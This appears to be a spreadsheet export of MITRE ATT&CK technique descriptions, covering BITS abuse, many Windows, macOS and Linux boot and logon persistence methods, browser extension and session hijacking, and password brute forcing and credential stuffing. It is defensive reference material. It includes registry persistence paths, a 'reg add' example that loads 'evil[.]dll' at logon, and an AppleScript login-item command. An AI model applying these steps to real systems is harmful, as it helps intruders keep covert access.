    <t>Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin)
Adversaries may abuse BITS to download (e.g. [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)), execute, and even clean up after running malicious code (e.g. [Indicator Removal](https://attack.mitre.org/techniques/T1070)). BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016)
BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016)</t>
  </si>
  <si>
    <t>Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.</t>
  </si>
  <si>
    <t>Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
Adversaries may abuse Active Setup by creating a key under &lt;code&gt; HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\&lt;/code&gt; and setting a malicious value for &lt;code&gt;StubPath&lt;/code&gt;. This value will serve as the program that will be executed when a user logs into the computer.(Citation: Mandiant Glyer APT 2010)(Citation: Citizenlab Packrat 2015)(Citation: FireEye CFR Watering Hole 2012)(Citation: SECURELIST Bright Star 2015)(Citation: paloalto Tropic Trooper 2016)
Adversaries can abuse these components to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.</t>
  </si>
  <si>
    <t>Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\&lt;/code&gt; with the key value of &lt;code&gt;"Authentication Packages"=&amp;lt;target binary&amp;gt;&lt;/code&gt;. The binary will then be executed by the system when the authentication packages are loaded.</t>
  </si>
  <si>
    <t>Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through &lt;code&gt;kextload&lt;/code&gt; and &lt;code&gt;kextunload&lt;/code&gt; commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t>Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.</t>
  </si>
  <si>
    <t>Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call &lt;code&gt;SMLoginItemSetEnabled&lt;/code&gt;.
Login items installed using the Service Management Framework leverage &lt;code&gt;launchd&lt;/code&gt;, are not visible in the System Preferences, and can only be removed by the application that created them.(Citation: Adding Login Items)(Citation: SMLoginItemSetEnabled Schroeder 2013) Login items created using a shared file list are visible in System Preferences, can hide the application when it launches, and are executed through LaunchServices, not launchd, to open applications, documents, or URLs without using Finder.(Citation: Launch Services Apple Developer) Users and applications use login items to configure their user environment to launch commonly used services or applications, such as email, chat, and music applications.
Adversaries can utilize [AppleScript](https://attack.mitre.org/techniques/T1059/002) and [Native API](https://attack.mitre.org/techniques/T1106) calls to create a login item to spawn malicious executables.(Citation: ELC Running at startup) Prior to version 10.5 on macOS, adversaries can add login items by using [AppleScript](https://attack.mitre.org/techniques/T1059/002) to send an Apple events to the “System Events” process, which has an AppleScript dictionary for manipulating login items.(Citation: Login Items AE) Adversaries can use a command such as &lt;code&gt;tell application “System Events” to make login item at end with properties /path/to/executable&lt;/code&gt;.(Citation: Startup Items Eclectic)(Citation: hexed osx.dok analysis 2019)(Citation: Add List Remove Login Items Apple Script) This command adds the path of the malicious executable to the login item file list located in &lt;code&gt;~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm&lt;/code&gt;.(Citation: Startup Items Eclectic) Adversaries can also use login items to launch executables that can be used to control the victim system remotely or as a means to gain privilege escalation by prompting for user credentials.(Citation: objsee mac malware 2017)(Citation: CheckPoint Dok)(Citation: objsee netwire backdoor 2019)</t>
  </si>
  <si>
    <t>Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the &lt;code&gt;AddMonitor&lt;/code&gt; API call to set a DLL to be loaded at startup.(Citation: AddMonitor) This DLL can be located in &lt;code&gt;C:\Windows\System32&lt;/code&gt; and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions.(Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors&lt;/code&gt;. 
The Registry key contains entries for the following:
* Local Port
* Standard TCP/IP Port
* USB Monitor
* WSD Port
Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.</t>
  </si>
  <si>
    <t>Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, spoolsv.exe, during boot. 
Adversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the &lt;code&gt;AddPrintProcessor&lt;/code&gt; API call with an account that has &lt;code&gt;SeLoadDriverPrivilege&lt;/code&gt; enabled. Alternatively, a print processor can be registered to the print spooler service by adding the &lt;code&gt;HKLM\SYSTEM\\[CurrentControlSet or ControlSet001]\Control\Print\Environments\\[Windows architecture: e.g., Windows x64]\Print Processors\\[user defined]\Driver&lt;/code&gt; Registry key that points to the DLL. For the print processor to be correctly installed, it must be located in the system print-processor directory that can be found with the &lt;code&gt;GetPrintProcessorDirectory&lt;/code&gt; API call.(Citation: Microsoft AddPrintProcessor May 2018) After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.(Citation: ESET PipeMon May 2020) The print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.</t>
  </si>
  <si>
    <t>Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named &lt;code&gt;com.apple.loginwindow.[UUID].plist&lt;/code&gt; within the &lt;code&gt;~/Library/Preferences/ByHost&lt;/code&gt; directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the &lt;code&gt;com.apple.loginwindow.[UUID].plist&lt;/code&gt; file to execute payloads when a user logs in.</t>
  </si>
  <si>
    <t>Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is &lt;code&gt;C:\Users\\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup&lt;/code&gt;. The startup folder path for all users is &lt;code&gt;C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp&lt;/code&gt;.
The following run keys are created by default on Windows systems:
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce&lt;/code&gt;
Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx&lt;/code&gt; is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: &lt;code&gt;reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"&lt;/code&gt; (Citation: Oddvar Moe RunOnceEx Mar 2018)
The following Registry keys can be used to set startup folder items for persistence:
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders&lt;/code&gt;
The following Registry keys can control automatic startup of services during boot:
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices&lt;/code&gt;
Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&lt;/code&gt;
The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit&lt;/code&gt; and &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell&lt;/code&gt; subkeys can automatically launch programs.
Programs listed in the load value of the registry key &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows&lt;/code&gt; run when any user logs on.
By default, the multistring &lt;code&gt;BootExecute&lt;/code&gt; value of the registry key &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager&lt;/code&gt; is set to &lt;code&gt;autocheck autochk *&lt;/code&gt;. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.
Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.</t>
  </si>
  <si>
    <t>Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
The SSP configuration is stored in two Registry keys: &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages&lt;/code&gt; and &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages&lt;/code&gt;. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)</t>
  </si>
  <si>
    <t>Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
Adversaries may abuse shortcuts in the startup folder to execute their tools and achieve persistence.(Citation: Shortcut for Persistence ) Although often used as payloads in an infection chain (e.g. [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)), adversaries may also create a new shortcut as a means of indirection, while also abusing [Masquerading](https://attack.mitre.org/techniques/T1036) to make the malicious shortcut appear as a legitimate program. Adversaries can also edit the target path or entirely replace an existing shortcut so their malware will be executed instead of the intended legitimate program.
Shortcuts can also be abused to establish persistence by implementing other methods. For example, LNK browser extensions may be modified (e.g. [Browser Extensions](https://attack.mitre.org/techniques/T1176)) to persistently launch malware.</t>
  </si>
  <si>
    <t>Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.(Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.(Citation: Microsoft TimeProvider)
Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of  &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\&lt;/code&gt;.(Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.(Citation: Microsoft TimeProvider)
Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account.(Citation: Github W32Time Oct 2017)</t>
  </si>
  <si>
    <t>Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in &lt;code&gt;HKLM\Software[\\Wow6432Node\\]\Microsoft\Windows NT\CurrentVersion\Winlogon\&lt;/code&gt; and &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\&lt;/code&gt; are used to manage additional helper programs and functionalities that support Winlogon.(Citation: Cylance Reg Persistence Sept 2013) 
Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)
* Winlogon\Notify - points to notification package DLLs that handle Winlogon events
* Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on
* Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on
Adversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.</t>
  </si>
  <si>
    <t>Adversaries may modify XDG autostart entries to execute programs or commands during system boot. Linux desktop environments that are XDG compliant implement functionality for XDG autostart entries. These entries will allow an application to automatically start during the startup of a desktop environment after user logon. By default, XDG autostart entries are stored within the &lt;code&gt;/etc/xdg/autostart&lt;/code&gt; or &lt;code&gt;~/.config/autostart&lt;/code&gt; directories and have a .desktop file extension.(Citation: Free Desktop Application Autostart Feb 2006)
Within an XDG autostart entry file, the &lt;code&gt;Type&lt;/code&gt; key specifies if the entry is an application (type 1), link (type 2) or directory (type 3). The &lt;code&gt;Name&lt;/code&gt; key indicates an arbitrary name assigned by the creator and the &lt;code&gt;Exec&lt;/code&gt; key indicates the application and command line arguments to execute.(Citation: Free Desktop Entry Keys)
Adversaries may use XDG autostart entries to maintain persistence by executing malicious commands and payloads, such as remote access tools, during the startup of a desktop environment. Commands included in XDG autostart entries with execute after user logon in the context of the currently logged on user. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make XDG autostart entries look as if they are associated with legitimate programs.</t>
  </si>
  <si>
    <t>Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely.  
Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. 
An adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist file that points to a specific script to execute with root privileges upon user logon. The plist file is located in the &lt;code&gt;/Library/Preferences/com.apple.loginwindow.plist&lt;/code&gt; file and can be modified using the &lt;code&gt;defaults&lt;/code&gt; command-line utility. This behavior is the same for logout hooks where a script can be executed upon user logout. All hooks require administrator permissions to modify or create hooks.(Citation: Login Scripts Apple Dev)(Citation: LoginWindowScripts Apple Dev) 
Adversaries can add or insert a path to a malicious script in the &lt;code&gt;com.apple.loginwindow.plist&lt;/code&gt; file, using the &lt;code&gt;LoginHook&lt;/code&gt; or &lt;code&gt;LogoutHook&lt;/code&gt; key-value pair. The malicious script is executed upon the next user login. If a login hook already exists, adversaries can add additional commands to an existing login hook. There can be only one login and logout hook on a system at a time.(Citation: S1 macOs Persistence)(Citation: Wardle Persistence Chapter)
**Note:** Login hooks were deprecated in 10.11 version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.(Citation: TechNet Logon Scripts) This is done via adding a path to a script to the &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt; Registry key.(Citation: Hexacorn Logon Scripts)
Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. </t>
  </si>
  <si>
    <t>Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence. Network logon scripts can be assigned using Active Directory or Group Policy Objects.(Citation: Petri Logon Script AD) These logon scripts run with the privileges of the user they are assigned to. Depending on the systems within the network, initializing one of these scripts could apply to more than one or potentially all systems.  
Adversaries may use these scripts to maintain persistence on a network. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.
Adversaries can establish persistence by adding a malicious binary path or shell commands to &lt;code&gt;rc.local&lt;/code&gt;, &lt;code&gt;rc.common&lt;/code&gt;, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence.
Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware)
Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)</t>
  </si>
  <si>
    <t>Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.(Citation: Startup Items)
This is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate folder, &lt;code&gt;/Library/StartupItems&lt;/code&gt; isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), &lt;code&gt;StartupParameters.plist&lt;/code&gt;, reside in the top-level directory. 
An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.</t>
  </si>
  <si>
    <t>Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.
Browser bookmarks may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://attack.mitre.org/techniques/T1552/001) associated with logins cached by a browser.
Specific storage locations vary based on platform and/or application, but browser bookmarks are typically stored in local files/databases.</t>
  </si>
  <si>
    <t>Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition)
Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions.
Previous to macOS 11, adversaries could silently install browser extensions via the command line using the &lt;code&gt;profiles&lt;/code&gt; tool to install malicious &lt;code&gt;.mobileconfig&lt;/code&gt; files. In macOS 11+, the use of the &lt;code&gt;profiles&lt;/code&gt; tool can no longer install configuration profiles, however &lt;code&gt;.mobileconfig&lt;/code&gt; files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS)
Once the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence.(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension)
There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.(Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command &amp; control.(Citation: Chrome Extension C2 Malware)</t>
  </si>
  <si>
    <t>Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)
A specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user then use the browser as a way to pivot into an authenticated intranet.(Citation: Cobalt Strike Browser Pivot)(Citation: ICEBRG Chrome Extensions) Executing browser-based behaviors such as pivoting may require specific process permissions, such as &lt;code&gt;SeDebugPrivilege&lt;/code&gt; and/or high-integrity/administrator rights.
Another example involves pivoting browser traffic from the adversary's browser through the user's browser by setting up a proxy which will redirect web traffic. This does not alter the user's traffic in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary assumes the security context of whichever browser process the proxy is injected into. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet, such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) or webmail, that is accessible through the browser and which the browser has sufficient permissions. Browser pivoting may also bypass security provided by 2-factor authentication.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.
Brute forcing credentials may take place at various points during a breach. For example, adversaries may attempt to brute force access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) within a victim environment leveraging knowledge gathered from other post-compromise behaviors such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), [Account Discovery](https://attack.mitre.org/techniques/T1087), or [Password Policy Discovery](https://attack.mitre.org/techniques/T1201). Adversaries may also combine brute forcing activity with behaviors such as [External Remote Services](https://attack.mitre.org/techniques/T1133) as part of Initial Access.</t>
  </si>
  <si>
    <t>Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
Credential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.
Typically, management services over commonly used ports are used when stuffing credentials. Commonly targeted services include the following:
* SSH (22/TCP)
* Telnet (23/TCP)
* FTP (21/TCP)
* NetBIOS / SMB / Samba (139/TCP &amp; 445/TCP)
* LDAP (389/TCP)
* Kerberos (88/TCP)
* RDP / Terminal Services (3389/TCP)
* HTTP/HTTP Management Services (80/TCP &amp; 443/TCP)
* MSSQL (1433/TCP)
* Oracle (1521/TCP)
* MySQL (3306/TCP)
* VNC (5900/TCP)
In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)</t>
  </si>
  <si>
    <t>Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) can be used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Further,  adversaries may leverage [Data from Configuration Repository](https://attack.mitre.org/techniques/T1602) in order to obtain hashed credentials for network devices.(Citation: US-CERT-TA18-106A) 
Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access.</t>
  </si>
  <si>
    <t>Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.
